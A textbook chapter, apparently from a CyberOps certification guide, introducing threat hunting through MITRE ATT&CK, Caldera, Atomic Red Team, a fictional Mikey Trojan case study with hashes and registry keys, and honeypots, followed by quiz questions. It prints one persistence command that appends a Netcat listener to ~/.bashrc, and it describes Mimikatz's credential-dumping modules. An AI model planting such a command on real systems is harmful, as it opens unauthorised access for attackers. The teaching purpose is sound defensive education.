Chapter 15. Introduction to Threat Hunting
This chapter covers the following topics:
• Threat Hunting and MITRE’s ATT&CK
• Threat Hunting, Honeypots, Honeynets, and Active Defense
No security product or technology in the world can detect and block all security threats in the continuously evolving threat landscape (regardless of the vendor or how expensive it is). This is why many organizations are tasking senior analysts in their computer security incident response team (CSIRT) and their security operations center (SOC) to hunt for threats that may have bypassed any security controls that are in place. This is why threat hunting exists. Threat hunting is the act of proactively and iteratively looking for threats in your organization. This chapter covers details about threat-hunting practices, the operational challenges of a threat-hunting program, and the benefits of a threat-hunting program.
“Do I Know This Already?” Quiz
The “Do I Know This Already?” quiz allows you to assess whether you should read this entire chapter thoroughly or jump to the “Exam Preparation Tasks” section. If you are in doubt about your answers to these questions or your own assessment of your knowledge of the topics, read the entire chapter. Table 15-1 lists the major headings in this chapter and their corresponding “Do I Know This Already?” quiz questions. You can find the answers in Appendix A, “Answers to the ‘Do I Know This Already?’ Quizzes and Review Questions.”
Table 15-1 “Do I Know This Already?” Section-to-Question Mapping
1. Which of the following statements about threat hunting is true?
a. Threat hunting is only performed by engineers outside the security operations center (SOC).
b. The hunting process requires deep knowledge of the network and is mostly performed by ethical hackers, penetration testers, or red team members who have deep knowledge of how attackers create malware.
c. The hunting process requires deep knowledge of the network and often is performed by SOC analysts (otherwise known as investigators, threat hunters, tier 2 or tier 3 analysts, and so on).
d. None of these answers are correct.
2. Threat hunting starts with a trigger based on which of the following?
a. An anomaly in the network
b. Threat intelligence
c. A hypothesis
d. All of the answers are correct.
3. Which of the following includes information about the tactics and techniques that adversaries use while preparing for an attack, including gathering of information (open-source intelligence [OSINT], technical and people weakness identification, and more)?
a. MITRE’s ATT&CK for Enterprise
b. MITRE’s PRE-ATT&CK
c. MITRE’s CWE
d. All of these answers are correct.
4. Which of the following is an open-source tool that can be used to collect and analyze threat intelligence, as well as document investigations and adversarial campaigns?
a. Caldera
b. Atomic Red Team
c. MITRE ATT&CK Navigator
d. Yeti
5. Which of the following techniques can provide all necessary information to conduct a system-specific threat hunt?
a. Honeypots
b. Honeynets
c. Automated adversarial emulation
d. None of these answers are correct.
Foundation Topics
What Is Threat Hunting?
No firewall, intrusion prevention system (IPS), data loss prevention (DLP) system, cloud security service, machine learning, or any other security product will ever be perfect and be able to detect and block all ever-evolving cybersecurity threats. This is why many organizations are tasking their analysts to hunt for threats that could not have been detected or blocked by the security controls they have in place.
The hunting process requires deep knowledge of the network and often is performed by SOC analysts (otherwise known as investigators, threat hunters, tier 2 or tier 3 analysts, and so on). Figure 15-1 illustrates the traditional SOC tiers and where threat hunters typically reside. In some organizations (especially small organizations), threat hunting could be done by anyone in the SOC because the organization might not have a lot of resources (analysts). The success of threat hunting completely depends on the maturity of the organization and the resources available (more on this later in this chapter).
Figure 15-1 SOC Tiers and Threat Hunting
Some organizations might have a dedicated team within or outside the SOC to perform threat hunting. However, one of the common practices is to have the hunters embedded within the SOC. Figure 15-2 shows how threat hunters can be structured as a dedicated team.
Figure 15-2 Threat-Hunting Dedicated Team
Threat hunters assume that an attacker has already compromised the network. Subsequently, they need to come up with a hypothesis of what is compromised and how an adversary could have performed the attack. For the threat hunting to be successful, hunters need to be aware of the adversary tactics, techniques, and procedures (TTPs) that modern attackers use. This is why many organizations are using MITRE’s ATT&CK framework to be able to learn about the tactics and techniques of adversaries. You will learn more about how MITRE’s ATT&CK can be used in threat hunting.
Threat hunting is not a new concept. Many organizations have performed threat hunting for a long time. However, in the last decade many organizations have recognized that they either have to implement a threat-hunting program or enhance their existing program to better defend their organization.
Threat Hunting vs. Traditional SOC Operations vs. Vulnerability Management
Threat hunting is not the same as the traditional SOC incident response (reactive) activities. Threat hunting is also not the same as vulnerability management (the process of patching vulnerabilities across the systems and network of your organization, including cloud-based applications in some cases). However, some of the same tools and capabilities may be shared among threat hunters, SOC analysts, and vulnerability management teams. Figure 15-3 shows how tools and other capabilities such as data analytics, TTPs, vulnerability feeds, and threat intelligence feeds may be used across the different teams and analysts in an organization.
Figure 15-3 Example of Tools and Feeds Used by the SOC, Threat Hunters, and Vulnerability Management Teams
Vulnerability management teams often use other tools such as vulnerability scanners, software composition analysis (SCA) tools, and many others that may not be used by the traditional SOC, but some may be used by threat hunters. This all depends on what are they hunting for and the hypothesis (and scenario).
The Threat-Hunting Process
There is no one-size-fits-all threat-hunting process; however, there are several common practices among mature organizations on how to perform threat hunting. Figure 15-4 shows a high-level threat-hunting process.
Figure 15-4 Example of a Threat-Hunting Process
A high-level threat hunting process includes the following steps:
1. Threat hunting starts with a trigger based on an anomaly, threat intelligence, or a hypothesis (what could an attacker have done to the organization?). From that moment you should ask yourself: “Do we really need to perform this threat-hunting activity?” or “What is the scope?”
2. Then you identify the necessary tools and methodologies to conduct the hunt.
3. Once the tools and methodologies are identified, you reveal new attack patterns, TTPs, and so on.
4. You refine your hunting tactics and enrich them using data analytics. Steps 2–3 can take one cycle or be iterative and involve multiple loops (depending on what you find and what additional data and research need to be done).
5. A successful outcome could be that you identify and mitigate the threat. However, you need to recognize that in some cases this may not be the case. You might not have the necessary tools and capabilities, or there was no actual threat. This is why the success of your hunting program depends on the maturity of your capabilities and organization as a whole.
Threat-Hunting Maturity Levels
You can measure the maturity of your threat-hunting program within your organization in many ways. Figure 15-5 shows a matrix that can be used to evaluate the maturity level of your organization against different high-level threat-hunting elements.
Figure 15-5 Threat-Hunting Maturity Levels
These threat-hunting maturity levels can be categorized as easily as level 1, 2, and 3, or more complex measures can be used. You can then use graphs like the ones illustrated in Figure 15-6 to measure your organization’s maturity in each of the elements or categories.
Figure 15-6 Measuring the Threat-Hunting Maturity
Threat Hunting and MITRE’s ATT&CK
In Chapter 14, “Classifying Intrusion Events into Categories,” you learned that you can use the MITRE’s ATT&CK framework to learn about the tactics and techniques that attackers used during their campaigns. The information in ATT&CK can be extremely useful for threat hunting.
ATT&CK (https://attack.mitre.org) is a collection of different matrices of tactics and techniques. PRE-ATT&CK (https://attack.mitre.org/tactics/pre) includes the tactics and techniques that adversaries use while preparing for an attack, including gathering of information (open-source intelligence [OSINT], technical and people weakness identification, and more).
Figure 15-7 shows the life of a cyber attack and how MITRE’s PRE-ATT&CK and ATT&CK outlines each technique. Keep in mind that this list is not complete because MITRE adds additional information to ATT&CK and PRE-ATT&CK on an ongoing basis.
Figure 15-7 The Life of a Cyber Attack, PRE-ATT&CK, and ATT&CK
As you can see, learning about the different adversary tactics and techniques is useful when threat hunting and also in other areas of cyber defense, as well as offensive security (penetration testing/ethical hacking).
MITRE also provides a list of software (tools and malware) that adversaries use to carry out their attacks. The list can be accessed at https://attack.mitre.org/software. You can also obtain detailed information about a specific tool or type of malware used by attackers for different purposes. For example, Figure 15-8 shows the well-known memory-scraping and credential-dumping malicious tool called Mimikatz in the MITRE ATT&CK Navigator. As you can see, the MITRE ATT&CK Navigator shows all the different tactics and techniques where Mimikatz has been used in many different attacks by a multitude of attackers.
Figure 15-8 Mimikatz Example in the MITRE ATT&CK Navigator
The MITRE ATT&CK Navigator allows you to download the results of each query (in this case, information about Mimikatz) in JSON machine-readable format. Example 15-1 shows the output of the JSON file listing the techniques and tactics where the Mimikatz tool has been used. The comments of each of the JSON file properties in Example 15-1 provide additional details about the adversarial techniques.
Example 15-1 MITRE ATT&CK Tactics and Techniques in JSON
{
“name": "Mimikatz (S0002)",
"version": "2.2",
"domain": "mitre-enterprise",
"description": "Enterprise techniques used by Mimikatz, ATT&CK software S0002 v1.1",
"filters": {
"stages": [
"act"
],
"platforms": [
"Windows",
"Linux",
"macOS"
]
},
"sorting": 0,
"viewMode": 0,
"hideDisabled": false,
"techniques": [
{
"techniqueID": "T1098",
"tactic": "credential-access",
"score": 1,
"color": "",
"comment": "The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The LSADUMP::ChangeNTLM and LSADUMP::SetNTLM modules can also manipulate the password hash of an account without knowing the clear text value.[2][7]",
"enabled": true,
"metadata": []
},
{
"techniqueID": "T1098",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The LSADUMP::ChangeNTLM and LSADUMP::SetNTLM modules can also manipulate the password hash of an account without knowing the clear text value.[2][7]",
"enabled": true,
"metadata": []
},
{
"techniqueID": "T1003",
"tactic": "credential-access",
"score": 1,
"color": "",
"comment": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSA, SAM table, credential vault, DCSync/NetSync, and DPAPI.[1][8][5][4]",
"enabled": true,
"metadata": []
},
{
"techniqueID": "T1081",
"tactic": "credential-access",
"score": 1,
"color": "",
"comment": "Mimikatz's DPAPI module can harvest protected credentials stored and/or cached by browsers and other user applications by interacting with Windows cryptographic application programming interface (API) functions.[2][5]",
"enabled": true,
"metadata": []
},
{
"techniqueID": "T1207",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "Mimikatz’s LSADUMP::DCShadow module can be used to make AD updates by temporarily setting a computer to be a DC.[1][2]",
"enabled": true,
"metadata": []
},
{
"techniqueID": "T1075",
"tactic": "lateral-movement",
"score": 1,
"color": "",
"comment": "Mimikatz's SEKURLSA::Pth module can impersonate a user, with only a password hash, to execute arbitrary commands.[2][4]",
"enabled": true,
"metadata": []
},
{
"techniqueID": "T1097",
"tactic": "lateral-movement",
"score": 1,
"color": "",
"comment": "Mimikatz’s LSADUMP::DCSync, KERBEROS::Golden, and KERBEROS::PTT modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.[2][3][6][4]",
"enabled": true,
"metadata": []
},
{
"techniqueID": "T1145",
"tactic": "credential-access",
"score": 1,
"color": "",
"comment": "Mimikatz's CRYPTO::Extract module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.[2]",
"enabled": true,
"metadata": []
},
{
"techniqueID": "T1101",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "The Mimikatz credential dumper contains an implementation of an SSP.[1]",
"enabled": true,
"metadata": []
},
{
"techniqueID": "T1178",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "Mimikatz's MISC::AddSid module can appended any SID or user/group account to a user's SID-History. Mimikatz also utilizes SID-History Injection to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.[2][3]",
"enabled": true,
"metadata": []
}
],
"gradient": {
"colors": [
"#ffffff",
"#66b1ff"
],
"minValue": 0,
"maxValue": 1
},
"legendItems": [
{
"color": "#66b1ff",
"label": "used by Mimikatz"
}
],
"metadata": [],
"showTacticRowBackground": false,
"tacticRowBackground": "#dddddd",
"selectTechniquesAcrossTactics": true
}
Automated Adversarial Emulation
MITRE and others in the industry have created several open-source tools to provide automated adversary emulation that can also help with some aspects of threat hunting. Caldera is one of those tools. Caldera was originally created by MITRE, but many security experts across the industry contribute to it. You can download Caldera from https://github.com/mitre/caldera.
Caldera is divided into different architectural components:
• Caldera Core services (including TTPs, command and control, and other capabilities)
• Plug-ins
• Agents that can run in Linux, Windows, and macOS
Figure 15-9 shows the components of Caldera’s architecture.
Figure 15-9 Caldera’s Architecture
Caldera’s default plug-in is 54ndc47 (Sandcat), which supplies the default agent (created in Go-lang) that can be run in Linux, Windows, and macOS operating systems. Figure 15-10 shows the main Caldera dashboard and the list of its components.
Figure 15-10 Caldera’s Components
Figure 15-11 shows the 54ndc47 agent options for agents running in different operating systems. These agents communicate with the core Caldera system and execute adversary emulation techniques and tactics.
Figure 15-11 54ndc47 Agent Options
Figure 15-12 shows an agent connected to the system. In this case, it is a Linux system with the host name victim-dio-1.
Figure 15-12 An Agent Connected to Caldera
Caldera enables you to simulate different types of adversaries that have different capabilities (tactics and techniques) that can be run against a system. Figure 15-13 shows how you can select from a predefined list of attacker/adversary profiles or create or customize a profile.
Figure 15-13 Caldera Adversary Profiles
After you connect your agents and set up the adversary profiles, you can create a Caldera operation. In Figure 15-14, a new operation with the name omar-super-secret-op-1 is created to launch automated attacks against the Caldera agents.
Figure 15-14 Caldera Operations
Tip
You can find Caldera’s full documentation and tutorials at https://caldera.readthedocs.io/en/latest.
Atomic Red Team is another tool/ecosystem that can be used to perform automated adversary emulation. Atomic Red Team is a collection of adversarial techniques mapped to MITRE’s ATT&CK documented in GitHub (https://github.com/redcanaryco/atomic-red-team). Example 15-2 shows a simple example of a basic technique where an adversary may insert arbitrary shell commands that may be used to execute other binaries to gain persistence on a system. In this example, every time a user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.
Example 15-2 Adding a Malicious Command to .bashrc
echo "nc -lvp 1337" >> ~/.bashrc
In Example 15-2 the attacker appends a line to the user’s .bashrc to open a listener using Netcat (nc) on port 1337. Atomic Red Team includes dozens of these techniques in a machine-readable format so that you can integrate with other tools or create new ones.
The next section provides a case study of a threat-hunting scenario triggered by threat intelligence and using many of the resources that you have learned throughout this book.
Threat-Hunting Case Study
Suppose you are part of a threat-hunting team that received a tip from a business partner indicating that they experienced an attack by a sophisticated adversary (APT1). The attack involved new variants of the Win.Trojan.Mikey-7914350-0 Trojan.
Note
This is a fictitious scenario used only to demonstrate the threat-hunting process from a high-level perspective.
Figure 15-15 shows the high-level steps followed in this threat-hunting scenario.
Figure 15-15 Threat-Hunting Scenario High-Level Steps
You quickly use MITRE’s ATT&CK Navigator to see more information about TTPs used by APT1, as demonstrated in Figure 15-16.
Figure 15-16 APT1 in MITRE’s ATT&CK Navigator
You also search in the Cisco Talos blog and obtain additional information about this Trojan. After reviewing additional threat intelligence information from Talos, you learn that Mikey is a Trojan that installs itself on the system, collects information, and communicates with a command and control (CnC or C2) server, potentially exfiltrating sensitive information. It can also receive additional commands and perform other malicious actions on the system, such as installing additional malware upon request. You do a quick query in your SIEM and do not have any information about this threat and decide to create the hypothesis for the threat hunt.
Your hypothesis is that some Windows systems that host sensitive information may have been compromised. Then you deep-dive into trying to reveal new patterns, tactics, techniques, and procedures. From analyzing more details about the Mikey Trojan, you learn that the malware has several variants matching the hashes in Example 15-3.
Example 15-3 Mikey Trojan-Associated Hashes
"Win.Trojan.Mikey-7914350-0": {
"bis": [
{
"bi": "pe-encrypted-section",
"hashes": [
"37dae85fa1f091a9c4270b77c628f46f559a8ed9d7a8302278ed348fbfa9fec0",
"049c2426192d0e9d1fc2db3ebd48e07166dab4e0c840b22d0f45ede076f61389",
"01bc3645259d6553ae26142e215713d74a4ab9b72ce70a0e407ef0b0c24f3a78",
"3d7043f6f4bd7a68f0829df9bacf696dc7e9ea36f5642a35efc197b98612f0e5",
"378819dbd951424471777f89811e16d58010b1161254b4b74bdf487861e5a5f7",
"1930371eb1a0cec8e5b7311f5476053304cff52572d3304cb71044159d7711ed",
"3bd0b289aa4a812494c325fe9364eacbc1e800e312d9048db9bc48c49ced3523",
"44a965a9c0f214704c2cd8c993ed701347e0fcd81132d4ee7085b22fe5031d48",
"341822381fec4eaec4d7735ccd63c250f7a93caab334cd6b44d3a7c7f623ef39",
"22ff13fa4513f554f10b6a38ee3f642cb2996788e4c6c4cfbed2962118ef73fd",
"0f07c570d967fdd014a1990c6b0bddaa8d0e096841faa93f3afdc1f55779d868",
"21eb0a07f6cbdaa846bc90ada59c653873674d1c417e86bad60619f28ce86102",
"2c35fea69feeff1bd9031260d8c11a46473c82fb5be8cbe185eb486fb5f72c84",
"19b2f654cd22a980242d96f861693c1a0d838df3d3627fb5247edf615badedea",
"46d1fa84a261bf0f281f59544a2d5175091c2a672864ed93301558cd80b82b3f",
"346a4804c4c61e3573b96fbfc1c3912087f2f68c01e4d50ba24e1e80c3aad02f",
"31eeee772b983f6553c1721920e8a9c4ffd4f9c9197ab8161d278347ac538f0a",
"1be801bcfc361a65283c4e8d07d2217d35a5ba9d356496a6c4f87043fc356f58",
"0d8f3110fbd771989644939a3b0fcff866870ff88c05df7ee5a1235e4c4749f8",
"19f84524d2718c165108376091927e42b63e2c8da8c2f92a37ae4c9c8d9275da",
"2b307f42f7cf30065cce12063b3bcb8803a1e19d4aa73792f440b0f80c91fcf3",
"2c45116ab57056f76d28d7a8929f1033bfdaaaaf2bf4a443ff150d75ae2b6013",
"4c044cec574a1b83c341b25e2b3febec0955e3d8163f3ecd3c3ccfff800f0608",
"1627c2372a603ac231a8709998ab1bf1096dea2e014cadd145afcf1dc550337e",
"20edee9146f0772dac4efb13e92b9aa0c267c95ae509d751c8a991f0a95d0d2b"
],
"mitre_attack_tags": [
"TA0005",
"T1027"
]
},
The hashes shown in Example 15-3 are a subset of a large JSON file that includes additional threat intelligence of related malware. You can obtain the complete JSON file from https://github.com/The-Art-of-Hacking/h4cker/blob/master/cyberops/mikey-trojan-threat-report.json. The JSON output in Example 15-3 also shows two MITRE ATT&CK techniques: TA0005 and T1027. The same threat intelligence JSON file reveals the Windows Registry keys that were modified by the Mikey Trojan (shown in Example 15-4).
Example 15-4 Registry Keys Modified by the Mikey Trojan
<HKCU>SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONEXPLORERDISCARDABLEPOSTSETUPCOMPONENT CATEGORIES{F3F18253-2050-E690-FED7-0BE7DF1E790D}
<HKCU>SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONEXPLORERDISCARDABLEPOSTSETUPCOMPONENT CATEGORIES{F3F18253-2050-E690-FED7-0BE7DF1E790D}ENUM
You create a quick script to search for the Registry keys in Example 15-4 and files matching any of the hashes shown in Example 15-3 and find two compromised systems. You discover adversaries used different methods to obfuscate commands executed from the malware payload. Environment variables, aliases, and specific semantics were used to evade signature-based detections and whitelisting mechanisms.
In addition, you also observe that the attacker encrypted the gathered information from the compromised system and hid it in an image before exfiltrating the image to a C2 server. This new technique was not observed by your business partner or any other previous threat intelligence you reviewed. After you remediate the compromised systems and recover from the attack, you create a new threat intelligence document using the Structured Threat Information Expression (STIX) format (in JSON) and share it with your business partner using Trusted Automated Exchange of Intelligence Information (TAXII).
Tip
You can obtain different examples of STIX documents at https://oasis-open.github.io/cti-documentation/stix/examples. Several open-source tools can be used to obtain threat intelligence from different sources, as well as document incidents and attack campaigns. One of the most popular is Yeti. Yeti is a tool that can help you organize threat intelligence, indicators of compromise, and adversary TTPs in a single, unified repository. You can download Yeti from https://github.com/yeti-platform/yeti. Figure 15-17 shows threat intelligence information in the Yeti. In Figure 15-17, the analyst searched for any threat intelligence tagged as a Windows executable (tag=exe).
Figure 15-17 Yeti’s Threat Intelligence Examples
Threat Hunting, Honeypots, Honeynets, and Active Defense
In some cases, performing hypothesis-based threat hunting is a "needle in the haystack" type of problem. The hunting process may require a lot of manual tasks if you do not have the necessary tools to automate parts of the hunt. For many years, security professionals have used honeypots and honeynets to help detect attacks and learn adversary TTPs. For instance, instead of trying to find “a needle in a haystack” and looking at the logs from many busy systems across your organization or in the cloud, you look at only one decoy system (a honeypot) or a collection of decoys (a honeynet). On the other hand, only having a honeypot or honeynet is not efficient nowadays. Honeypots and honeynets are useful only if an adversary interacts with them. Sophisticated attackers have ways to detect if the victim system may be a honeypot. For instance, if an attacker has identified domain admins and attempts a default password, it becomes immediately obvious. Attackers and malware can also detect if the system does not have any changes in CPU utilization, mouse movements, clipboard contents, and other typical behaviors that an end-user system may have.
Some organizations have introduced the concept of "honeypotting as a service": essentially, you can buy on-demand honeypot services that reduce the time and effort required to set up and monitor a honeypot. Another concept that has emerged throughout the years is the concept of adaptive honeypots and active security defense. Active defense involves actively responding to adversaries once detected. The nature and scope of the response can vary. It could be that you enhance your monitoring capabilities or that you isolate attackers to one area of your network to learn their TTPs. Some people confuse honeypots/honeynets and active defense with threat hunting. From previous examples in this chapter, you have learned that they are not the same thing.
Tip
The Honeynet Project is an international nonprofit organization that helps develop open-source tools that can be used to analyze adversarial tactics and techniques against intentionally vulnerable systems. The Honeynet Project has chapters around the world. Information about the Honeynet Project can be obtained from its website at https://www.honeynet.org.
Throughout this book you have learned that cybersecurity operations (CyberOps) is not just one method or technique. It is a practice that will continue to evolve throughout the years as attackers become more sophisticated and technology continues to progress. The concepts that you learned in this book and the CyberOps Associates certification will help you get a good foundation and prepare you to better defend your network and underlying systems.
Exam Preparation Tasks
Review All Key Topics
Review the most important topics in this chapter, noted with the Key Topics icon in the outer margin of the page. Table 15-2 lists these key topics and the page numbers on which each is found.
Table 15-2 Key Topics for Chapter 15
Define Key Terms
Define the following key terms from this chapter and check your answers in the glossary:
Review Questions
The answers to these questions appear in Appendix A, “Answers to the ‘Do I Know This Already?’ Quizzes and Review Questions.” For more practice with exam format questions, use the exam engine on the website.
1. What is a framework developed and maintained by MITRE that provides a collection of matrices of adversarial tactics and techniques?
2. Vulnerability scanners and software composition analysis are tools that are used by _________________ teams.
3. Developing a hypothesis, identifying the necessary tools and methodologies to find security threats, and refining tactics using data analytics are steps in the ____________ process.
4. Caldera is an example of a(n) ___________________tool.
5. What is a collection of adversarial techniques mapped to MITRE’s ATT&CK?